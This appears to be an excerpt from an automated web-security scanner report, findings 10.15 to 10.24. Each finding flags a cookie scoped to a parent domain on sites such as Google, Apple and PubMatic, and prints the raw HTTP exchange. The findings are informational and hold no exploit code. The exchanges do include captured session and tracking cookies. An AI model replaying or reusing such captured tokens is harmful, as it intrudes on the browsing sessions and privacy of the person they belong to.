Cookie: pajpm1-temp="Tue Jul 12 12:29:11 EDT 2011"; JSESSIONID=CE57AB5A9A7C046C70A540F049D96361; __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:29:17 GMT
Server: Apache
Set-Cookie: pajpm5=sailSession; Domain=.jpmorgan.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 10225


                   <SCRIPT type="text/javascript">
<!--
   var cookieEnabled=(navigator.cookieEnabled)? true : false
   //if not IE4+ nor NS6+
   if (typeof navigator.cooki
...[SNIP]...

10.15. http://id.google.com/verify/EAAAAAA8ZuvsS7JEKK-IQjYnqI0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAAA8ZuvsS7JEKK-IQjYnqI0.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAAA8ZuvsS7JEKK-IQjYnqI0.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=adobe+psirt+web+server+security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=JlF2Ve9cr9tNyLD4ZI8Hh8Zm9dmJGlgzHtojDX0u=XNCKdN_4bGk7uLcn; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=PrTm1sPBV8WcGKUpX24DX5FxWwEiYnRIQG1U8UDSmVNfNlXO4RsMbeCllROY8jurLY0nQ0ao8uAFMmNgXjVJP4Qp83yBr8GEcfw9vqYyVe1aEd9Jnty9TfIHuCmfrKOA

Response

HTTP/1.1 200 OK
Set-Cookie: NID=48=JND5NXvsSmFsBYvmrygMdzkGQswKJjIx-ckH2uK2OSHREX1f2o6ny0zTZ4mCnyT28X86cgIb7E2AtI99MfwKIztxvmcPwEEnk_nEBgeTgALZ0eooxulD-TiqDrXhRemv; expires=Wed, 11-Jan-2012 20:41:01 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:41:01 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.16. http://id.google.com/verify/EAAAAB5TmvHS4JtvGgryw3OQbj8.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAB5TmvHS4JtvGgryw3OQbj8.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAB5TmvHS4JtvGgryw3OQbj8.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=adobe+psirt
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=vgu7nJh0OOj_R3rfoTk_2iy3JQ0c3cKwGSV1uXyt=TzKGQ_4u__SbdsyK; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=PrTm1sPBV8WcGKUpX24DX5FxWwEiYnRIQG1U8UDSmVNfNlXO4RsMbeCllROY8jurLY0nQ0ao8uAFMmNgXjVJP4Qp83yBr8GEcfw9vqYyVe1aEd9Jnty9TfIHuCmfrKOA

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=48=JlF2Ve9cr9tNyLD4ZI8Hh8Zm9dmJGlgzHtojDX0u=XNCKdN_4bGk7uLcn; expires=Wed, 11-Jan-2012 20:40:09 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:40:09 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.17. http://id.google.com/verify/EAAAALupUYoUPVshUibYW8x6f5I.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAALupUYoUPVshUibYW8x6f5I.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAALupUYoUPVshUibYW8x6f5I.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://511.dot.ri.gov/hb/main.jsf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=JlF2Ve9cr9tNyLD4ZI8Hh8Zm9dmJGlgzHtojDX0u=XNCKdN_4bGk7uLcn; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=JND5NXvsSmFsBYvmrygMdzkGQswKJjIx-ckH2uK2OSHREX1f2o6ny0zTZ4mCnyT28X86cgIb7E2AtI99MfwKIztxvmcPwEEnk_nEBgeTgALZ0eooxulD-TiqDrXhRemv

Response

HTTP/1.1 200 OK
Set-Cookie: NID=48=G8GXu_mu_V4v5YxE2RqVYl3gQcYLRg30PTyN25cOw1cLTLBKpupiwM_D9n2e3-VyC48S_mOn73wfajzGDfFiwn12C9Ufm9LtLqm9u-FMzXndz4J5LJqChVjL88zMCKHU; expires=Thu, 12-Jan-2012 00:37:19 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Wed, 13 Jul 2011 00:37:19 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.18. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=9afcf94a-90e6-425e-a175-116aed2ea643&cacheBust=1310503167 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?01AD=2-2-C853333EC652166FAF7E3D0062149675759E1277B74C3E759400B711FCF64130-AD2295ECB4683944460A9D5F04A88CAF4EB4854AF4BF19B0D63B2248D4643BCA&01RI=02572381EDA0358&01NA=&m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; tpd=e20=1311819163224&e90=1309831963205&e50=1311819163964&e100=1309831963322; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8803=734323&11206=734324&7382=734325

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734329&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8803=734323&11206=734324&7382=734325; domain=.interclick.com; expires=Mon, 12-Jul-2021 20:39:29 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 12 Jul 2011 20:39:29 GMT

GIF89a.............!.......,...........D..;

10.19. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9MTI1MiZ0bD0xNTc2ODAw=1310503209 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_27=1216-uid:4dd07bc8-e97b-118c-3dec-7b8c5c306530; KRTBCOOKIE_32=1386-WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; KRTBCOOKIE_16=226-uid:3460050161923843111; KRTBCOOKIE_153=1923-PFHfHjxXhEglBtlKPwGRHG1Q3RglDd5LPQdIK3DV; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.11265.29191.32345.48153.48669.48674.2083.1073.49076.48190.32326.45639.45640.45641.48203.48205.59481.32350.45677.30833.45683.1150.9855.13450.45708.45714.30915.30364.30878.49317.27165.47281.40626.29899.55492.199.34505.; KRTBCOOKIE_107=1471-uid:ea5c094a-3a81-4d54-b8e2-975f65fd39a9; KRTBCOOKIE_179=2451-uid:5475024508341082; KRTBCOOKIE_200=3683-d9b3a291e16202bc73f25332debaba4289e1f293b56107bf21f8003e8dbde946; PUBMDCID=2; KRTBCOOKIE_148=1699-uid:E3F32BD05A8DDF4D5646D79640088B; PUBRETARGET=571_1400116791.82_1400116792.1252_1400118837.78_1400354702.1985_1309635446.461_1401136140.76_1310782572.2018_1311177776.1647_1310434072.806_1340039067.1298_1403835795.2114_1324986825.2138_1404051902

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:10 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=571_1400116791.82_1400116792.1252_1400118837.78_1400354702.461_1401136140.76_1310782572.2018_1311177776.806_1340039067.1298_1403835795.2114_1324986825.2138_1404051902; domain=pubmatic.com; expires=Sun, 29-Jun-2014 14:25:02 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html


10.20. http://images.apple.com/global/nav/styles/navigation.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "2930-4a3055a8a0000"
If-Modified-Since: Wed, 11 May 2011 19:48:16 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 11 May 2011 19:48:16 GMT
ETag: "2930-4a3055a8a0000"
Cache-Control: max-age=555
Expires: Tue, 12 Jul 2011 18:08:21 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=CIcsZEOfgL0sAaZ8eSE17AFggQH5Wah4zHUw1N8AvvBssDHyYgWQL91QXmtQCmB4gSwkwYyqm73dAyXB2+z2e4ceAclkObFKyIELq4KsLieOpRdSvUJ+S6iLPn9mPiReSiQQSuJB5Xx8pd9k+fjRNrVLvYSR/N8CtSMpr2o0OIL/oPSq3G29JkjfYJLVKIaYLuI0MceBeHIdr7rjeAwBW93GO1YHAoo2M/YJJ1H79RcXMYqmAxSiNpRHubkoEESHcP58EF8xis6VYMFJ7/NPJfS2d2cy/5PnIef3J/ioYNgZ9FzbG5OQTPUNKsQ6vAOCgkodcB9q2br6R98WoPRTvLZIaONCl7pps02CG8aoBiwA9ZfnFFeyjMDfrEWZ3nUpObyFhipewZyfw46VH2lEGNCc1mbGQcwuLeku5yTG/i3spwWjqaT3N5UhDippIRy8awUxyxhMArUqq7Q0idZNXqa/9jndUv2NE57oFm708RdB0z89rJNr1S6jjRD2iu6MLWFIXVnDCk0EAImAauOAKV0fJbW6RngJTPb5vevYhxpFLnHEn3RIGcxXM0KoB1Qs; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.21. http://images.apple.com/global/scripts/apple_core.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/apple_core.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/apple_core.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "52da-4a36ce1818580"
If-Modified-Since: Mon, 16 May 2011 23:19:02 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Mon, 16 May 2011 23:19:02 GMT
ETag: "52da-4a36ce1818580"
Cache-Control: max-age=308
Expires: Tue, 12 Jul 2011 18:04:14 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=qqRmbycaEdWv2ZnmA2CwWnaQ7IYfLpsMkc+Bn0i2XHLbR7gKLjXcOtz2c+ZUfbZXcZscQs/AXl4PaPr9HuQ4FzZ66Pl0PDDwngZT6lsIbLOF09sUk+P6SIf54aYx5xNmId5A+wIczriN4VqQHs9VO4DBduMbAoToPmNYdLkGTHQqnX+BIwSuVJemestpIM+fza/6QxefclqBxGiK22BY1XpkdF9n9Qgd/pV85T5DqbbID55xGbe33wbAHE59DUMlKa0TwWxBIkxyEGPXGGerewFMUUbYls+/ycEQyuu8FnWNXizkulCFro0Sl00qbBNyDBVdoF6Oh01kny5mZlzhsBMBYJysPo/SjmHxnrwfWE7pzBvkoTY5WpOjOPcrTTJcv05CN5ZkxB/AUdIc2l/fuXXJUOka/ysYajuPN9hTPPN4kF8u8eZ9ZsNtiUPYqgE5GzBs/7fkZB59tD2XoRWJoK/txiars8qRpbVwlfNrS5iBTt7Kz6tFdKeoCKBFqXkY/Fe9oUgP7AXi0aZVyMroDZadqSOfUXZFzvAAGQ0/tVvSjIGlrhJ+mzUeLdYG9PrX; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.22. http://images.apple.com/global/scripts/browserdetect.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/browserdetect.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/browserdetect.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "25fd-4a4e72621e9c0"
If-Modified-Since: Sat, 04 Jun 2011 18:36:31 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sat, 04 Jun 2011 18:36:31 GMT
ETag: "25fd-4a4e72621e9c0"
Cache-Control: max-age=321
Expires: Tue, 12 Jul 2011 18:04:27 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=CYikw9mUNd+LksdcL1yhHxAK/7W6WcnsQkboRUpHtEDnN0V8p9KL++okE5cE6iwecDzjEUeVIpdTy9LQKFxE+1oMp7pNUpcSLfn2E3nLJTHSATGO1JPQtxjlJnQW/zLcDX9N/oV+Tyxo23oLguPmXP815X/38kpCwKlppUs8Wu5c2CJ+QV3VUDkiFQOM7fvb33OneKiZrCQnvlz7peX4bdktGC01Eivt1JoL3oNyeKJ7NJ1Bs0fsGdBpgU+4v9v51NM0+g5Ji5hCkrN4M49XFyPLMrfUgQai61WxI3f4zRRFMS3H32HAqrZ38/IbdBqTebGNzlp0yFkbeEeH/TF0OHCNKEgeYeGKbgVdY9KM8bHSZ03WWPRsmHtUAZ6sfONQHgHm+/+jKy5EHFIKmvOIhbc4/eCAMXtzchQeTf0cs4kwkF5OH3xNtAupUIzWXkWTPtjelZUfwLn07EFbzWrK98+FODVLywjyVdzPpPlAZGChoASpQEqJjNY8+aAn2kbSzg0XQY+4M08V9ON10ikUSD1wi1EB1iCHaCxIeRWXpA8NSHt9636T0Sy54wo8WTaX; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.23. http://images.apple.com/global/scripts/lib/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/lib/prototype.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/prototype.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "27df1-49fbc451c6740"
If-Modified-Since: Thu, 31 Mar 2011 00:21:09 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 31 Mar 2011 00:21:09 GMT
ETag: "27df1-49fbc451c6740"
Cache-Control: max-age=365
Expires: Tue, 12 Jul 2011 18:05:11 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=/GWqwGkzN6Ws3leoAolktOEan1NuvFXQIf/3yzNmSeVJ8DHb7FRpK8DbWRV/yanDpTRknPEuRYyT2l4s+iyqQz1XJAvuebXB/JPDrYBDcCfTsFWBMAlecqV0+cyr1JKYYDn8dXOsvljXIPE6ZAIrD2x3m6Z9qD7jJw76XlIU+ZR1v7fYF+lGLxsdn01CTbAdaYNwHpixwAugmm5SdMhkXGtW/V0ymHvytmVCuq0k8DLIJfqwVTd8T3T7jjF7FbQ4jLtQB4ZYyxAXVSlmr3vBQaFjG34/9qt0OxOBoDHwCJPgK6Cd1A7cU+fLEVkm8MD2Bu1OPGkXyRjGSs2HqppbQQ5tt6APBA0P6jXXcbI48oh55lgUAvgpAWjZxIfj7DLPsILLMHwrjK0Cx2RktBDCnjSAQIPCbfuGhNknwQRaZqhfGMm5oD9WqQEMSWYyQMBW7rOLvjN/dEvjp3GucxubTpZidqjs+Fwp5wSPJ9J2OVr1YOIZ1YzKtyNBd+88ZlnYiPcW9jp1inzVmYAvJ21IVATu2QxPuUmYLUE3XMWVYIPc4vh7CVI8TBZbqKjY/4io; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.24. http://images.apple.com/global/scripts/lib/scriptaculous.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/lib/scriptaculous.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/scriptaculous.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "1cf46-44d159ddcfc40"
If-Modified-Since: Tue, 13 May 2008 05:05:45 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Tue, 13 May 2008 05:05:45 GMT
ETag: "1cf46-44d159ddcfc40"
Cache-Control: max-age=466
Expires: Tue, 12 Jul 2011 18:06:52 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
